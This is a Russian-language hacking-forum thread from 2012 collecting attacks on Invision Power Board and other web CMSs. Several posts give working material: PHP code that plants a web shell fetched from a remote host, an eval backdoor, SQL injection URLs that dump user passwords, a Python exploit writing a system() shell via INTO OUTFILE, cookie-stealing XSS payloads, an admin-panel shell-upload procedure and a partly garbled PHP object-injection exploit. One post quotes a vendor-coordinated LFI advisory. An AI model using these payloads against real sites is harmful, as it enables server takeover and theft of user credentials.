HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 05.01.2012, 16:25
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Заливка шелла IPB 3.x

Вроде такого не было:

1) Идем в админку => Внешний вид => IP.Board(текущий шаблон) => globalTemplate

2) Ставим код между тегами и и жмем Сохранить.

3) Ваш код доступен по адрес http://site/forum/index.php

Не советую туда вставлять бэкдор, типа:

if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

Так как залитый шелл этим бэкдором будет nobody. Поэтому лучше сразу:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site/shell.txt); //ваш адрес шелла

[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'/path/to/writeable/dir/'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//папка доступная для записи

[/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$br[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'shell.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"w"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Тогда шелл будет выполнятся как другие скрипты на сервере.
 
Ответить с цитированием

  #52  
Старый 05.01.2012, 17:49
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Не советую туда вставлять бэкдор, типа:
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));
Так как залитый шелл этим бэкдором будет nobody. Поэтому лучше сразу:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site/shell.txt); //ваш адрес шелла

[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'/path/to/writeable/dir/'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//папка доступная для записи

[/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$br[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'shell.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"w"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Тогда шелл будет выполнятся как другие скрипты на сервере.
с чего это вдруг?
 
Ответить с цитированием

  #53  
Старый 10.01.2012, 03:54
boortyhuhtyu
Guest
Сообщений: n/a
Провел на форуме:
225312

Репутация: -6
По умолчанию

[QUOTE="freecold"]
freecold said:

Testing target URL ...

Fetching topics from ID 1

No topics found.

Last ditch effort, enter topic:

???​
 
Ответить с цитированием

  #54  
Старый 07.04.2012, 15:20
mr.Penguin
Guest
Сообщений: n/a
Провел на форуме:
10816

Репутация: 74
По умолчанию

AnGrY BoY/Siteframe 3.2.3 SQL Injection

Код:
Code:
# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
# Google Dork: "powered by Siteframe"
# Date: 29/12/2010
# Author: AnGrY BoY
# Software Link: http://sitefrane.org/downloads/
# Version: Siteframe 3.2.3
# Tested on: windows SP2
# CVE : N/A
 
# expolit:
 
# http://localhost/path/user.php?id=[SQL]
 
# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--
 
======================================================================================
# Special Thanks:- all h4kurd members
Vasil A./Invision Power Board 3.2.3 Cross Site Scripting

Код:
Code:
Name :  Cross-site scripting vulnerability in Invision Power Board version 3.2.3
Software :  Invision Power Board version 3.2.3
Vendor Homepage :  http://www.invisionpower.com
Vulnerability Type :  Cross-site scripting
Researcher :  Vasil A. xss@9y.com
 
Description
--------------------
Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an
Internet forum software produced by Invision Power Services, Inc. It
is written in PHP and primarily uses MySQL as a database management
system, although support for other database engines is available.
 
Details
--------------------
IP Board is affected by a Cross-site scripting vulnerability in version 3.2.3.
 
Example PoC url is as follows :
 
http://example.com/forums/index.php?showforum=53">with(document)alert(cookie)
 
Additional notes:
1.If a forum contain sub-forums this vulnerability don't exist.
 
2.Most of boards uses "Friendly Url style",but the attack can be
performed  by using "legacy URL style" in the query,e.g :
 
http://example.com/forum/index.php?showforum=2">alert(/xss/.source)
 
instead:
 
http://example.com/forum/index.php?/forum/2-example/
 
Solution
--------------------
The vendor issued patch for this vulnerability. Please see the references.
 
Advisory Timeline
--------------------
10/03/2012 - First contact: Sent the vulnerability details
12/03/2012 - Second contact: Ask for patch
14/03/2012 - Vulnerability Fixed
15/03/2012 - Vulnerability Released
 
Credits
-------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.
AutoSec Tools/LightNEasy 3.2.3 SQL Injection

Код:
Code:
# ------------------------------------------------------------------------
# Software................LightNEasy 3.2.3
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.lightneasy.org/
# Discovery Date..........4/21/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch 
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to
# extract arbitrary data. In some environments it may be possible to
# create a PHP shell.
# 
# 
# --PoC--
 
import socket
 
host = 'localhost'
path = '/lne323'
shell_path = '/shell.php'
port = 80
 
def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    
 
    s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 73\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n'
           'Accept: text/html\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="submit"\r\n'
           '\r\n'
           '\r\n'
           '------x--\r\n'
           '\r\n')
 
    resp = s.recv(8192)
 
    http_ok = 'HTTP/1.1 200 OK'
 
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)     
 
    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')
 
    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
    else: print 'shell located at http://' + host + shell_path
 
upload_shell()
 
Ответить с цитированием

  #55  
Старый 22.04.2012, 14:40
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

забавно, никто не отпостил даже

Код:
Code:
[waraxe-2012-SA#086] - Local File Inclusion in Invision Power Board 3.3.0
========================================================================
=======

Author: Janek Vind "waraxe"
Date: 12. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-86.html
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2226

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet
forum software produced by Invision Power Services, Inc.
It is written in PHP and primarily uses MySQL as a database management system,
although support for other database engines is available.

Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Affected are Invision Power Board versions 3.3.0 and 3.2.3, older versions
may be vulnerable as well.

########################################################################
#######
1. Local File Inclusion in "like.php" function "_unsubscribe"
########################################################################
#######

CVE Information:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2226 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

Vulnerability Details:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
Reason: using unsanitized user submitted data for file operations
Attack vector: user submitted GET parameter "key"
Preconditions:
1. attacker must be logged in as valid user
2. PHP must be request['key'] ) );

list( $app, $area, $relId, $likeMemberId, $memberId, $email ) = explode( ';', $key );

/* Member? */
if ( ! $this->memberData['member_id'] )
{
$this->registry->output->showError( 'no_permission', 'pcgl-1' );
}

if ( ! $app || ! $area || ! $relId )
{
$this->registry->output->showError( 'no_permission', 'pcgl-1' );
}

if ( ( $memberId != $likeMemberId ) || ( $memberId != $this->memberData['member_id'] ) )
{
$this->registry->output->showError( 'no_permission', 'pcgl-2' );
}

if ( $email != $this->memberData['email'] )
{
$this->registry->output->showError( 'no_permission', 'pcgl-3' );
}

/* Think we're safe... */
$this->_like = classes_like::bootstrap( $app, $area );
-----------------[ source code end ]-----------------------------------

As seen above, user submitted parameter "key" is first base64 decoded and then
splitted to six variables. After multiple checks function "bootstrap()" is called,
using unvalidated user submitted data for arguments.

Source code snippet from vulnerable script "composite.php":
-----------------[ source code start ]---------------------------------
static public function bootstrap( $app=null, $area=null )
{
..
if( $area != 'default' )
{
$_file = IPSLib::getAppDir( $app ) . '/extensions/like/' . $area . '.php';
..
}
..
if ( ! is_file( $_file ) )
{
..
throw new Exception( "No like class available for $app - $area" );
..
}
..
$classToLoad = IPSLib::loadLibrary( $_file, $_class, $app );
-----------------[ source code end ]-----------------------------------

We can see, that variable "$_file" is composed using unvalidated argument "area".
Next there is check for file existence and in case of success next function,
"loadLibrary", is called, using unvalidated argument "$_file".

Source code snippet from vulnerable script "core.php":
-----------------[ source code start ]---------------------------------
static public function loadLibrary( $filePath, $className, $app='core' )
{
/* Get the class */
if ( $filePath != '' )
{
require_once( $filePath );/*noLibHook*/
}
-----------------[ source code end ]-----------------------------------

As seen above, "require_once" function is used with unvalidated argument.

Test: we need to construct specific base64 encoded payload.
First, semicolon-separated string:

forums;/../../test;1;1;1;come2waraxe (at) yahoo (dot) com [email concealed]

Email address and other components must be valid for successful test.

After base64 encoding:

Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlhaG9vLmNvbQ

Now let's log in as valid user and then issue GET request:

http://localhost/ipb330/index.php?app=core&module=global&section=like
&do=unsubscribe&key=Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlh
aG9vLmNvbQ

Result:

Fatal error: Uncaught exception 'Exception' with message 'No like class available
for forums - /../../test' in C:\apache_www\ipb330\admin\sources\classes\like\composite.php:333
Stack trace: #0 C:\apache_www\ipb330\admin\applications\core\modules_public\global\like.
php(131):
classes_like::bootstrap('forums', '/../../test')
#1 C:\apache_www\ipb330\admin\applications\core\modules_public\global\like.
php(44):
public_core_global_like->_unsubscribe()
#2 C:\apache_www\ipb330\admin\sources\base\ipsController.php(306):
public_core_global_like->doExecute(Object(ipsRegistry)) #3
C:\apache_www\ipb330\admin\sources\base\ipsController.php(120): ipsCommand->execute(Object(ipsRegistry))
#4 C:\apache_www\ipb330\admin\sources\base\ipsController.php(65): ipsController->handleRequest()
#5 C:\apache_www\ipb330\index.php(26): ipsController::run()
#6 {main} thrown in C:\apache_www\ipb330\admin\sources\classes\like\composite.php on line 333

Potential attack scenario:

1. Attacker registers to target forum and logs in as valid user
2. Attacker uploads avatar picture with malicious php code to target server
3. Attacker issues carefully crafted GET or POST request and as result gets php level access

There are many other ways to exploit LFI (Local File Inclusion) vulnerabilities,
for example by using procfs ("proc/self/environ") on *nix platforms.

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~

Update to new version 3.3.1

http://community.invisionpower.com/topic/360518-ipboard-331-ipblog-252-i
pseo-152-and-updates-for-ipboard-32x-ipgallery-42x-released/

Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~

27.03.2012 Developers contacted via email
28.03.2012 Developers confirmed upcoming patch
11.04.2012 Developers announced new version release
12.04.2012 Advisory released

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------
__________________
 
Ответить с цитированием

  #56  
Старый 02.06.2012, 14:16
Dart Raiden
Guest
Сообщений: n/a
Провел на форуме:
269

Репутация: 0
По умолчанию

Invision Power Board 3.2.0 - 3.2.3. Cross Site Scripting

Добавляем в свое сообщение

Код:
Code:
[img]src="123" onError="alert(document.cookie);"[/img]
+ немного соц.инженерии: размещаем пост с таким содержанием, чтобы администратор/модератор его отредактировал, добавляем в конце ядовитый код, маскируем его тэгом [color]. При попытке редактирования происходит выполнение.

фикс выпущен 9 марта (аж через 2 месяца после сообщения разработчикам об уязвимости)
 
Ответить с цитированием

  #57  
Старый 31.10.2012, 01:23
slipknot12
Guest
Сообщений: n/a
Провел на форуме:
1470

Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela  
Pashkela said:
Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха) -
еще один вариант
по аналогии с этим постом:
/showpost.php?p=977862&postcount=10
но небольшие изменения:
1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый
2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"
3. Идем в нашу папочку (на примере Denwer)
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
и суем туда наш любимый wso2.php
4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz
5. В архиве файлик images-master.xml
Переименовываем архив!
таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" -
images-master2.xml.gz
, название файлика в архиве сменится автоматом
6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений
Рядом с
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
появится
C:\WebServers\home\drup614.ru\www\public\style_ima ges\master2
где будет лежать все тоже самое, плюс наш шелл
в итоге шелл будет по адресу:
http://forum.site.ru/public/style_images/master2/wso2.php
PS: не забудьте потом переместить шелл и удалить каталог master2
Готовый архив с картинками и
шеллом
можно взять
тут
, останется только изменить циферку
мб у кого архив с шеллом остался перезалейте пожалуйста
 
Ответить с цитированием

  #58  
Старый 27.11.2012, 18:03
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

[B]Invision Power Board \n";

print
"\nExample....: php$argv[0]localhost /";

print
"\nExample....: php$argv[0]localhost /ipb/\n";

die();

}



list(
$host,$path) = array($argv[1],$argv[2]);



$packet="GET{$path}index.php HTTP/1.0\r\n";

$packet.="Host:{$host}\r\n";

$packet.="Connection: close\r\n\r\n";



$_prefix=preg_match('/Cookie: (.+)session/',http_send($host,$packet),$m) ?$m[1] :'';



class
db_driver_mysql

{

public
$obj= array('use_debug_log'=>1,'debug_log'=>'cache/sh.php');

}

# Super bypass by @i0n1c

$payload=urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2 :{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"c ache/sh.php";}}}');

$phpcode='';



$packet="GET{$path}index.php?{$phpcode}HTTP/1.0\r\n";

$packet.="Host:{$host}\r\n";

$packet.="Cookie:{$_prefix}member_id={$payload}\r\n";

$packet.="Connection: close\r\n\r\n";



http_send($host,$packet);



$packet="GET{$path}cache/sh.php HTTP/1.0\r\n";

$packet.="Host:{$host}\r\n";

$packet.="Cmd: %s\r\n";

$packet.="Connection: close\r\n\r\n";



if (
preg_match('/

[/COLOR]
[/PHP]
(c) exploit-db.com
 
Ответить с цитированием

  #59  
Старый 28.11.2012, 10:21
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

[QUOTE="-=lebed=-"]
-=lebed=- said:
[B][COLOR="Red"]Invision Power Board
 
Ответить с цитированием

  #60  
Старый 14.12.2012, 14:13
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

скорее фишка, которая катит на некоторых версиях ipb, пока не разобрался от чего все зависит.

суть:

есть вероятность подписатся на тему , зная ее номер с пользователя не имеющего прав для просмотра темы.

/subscription.php?do=addsubscription&t=[номер_темы]
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
[Обзор уязвимостей XMBForum] [x26]VOLAND Уязвимости CMS / форумов 0 19.05.2008 13:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ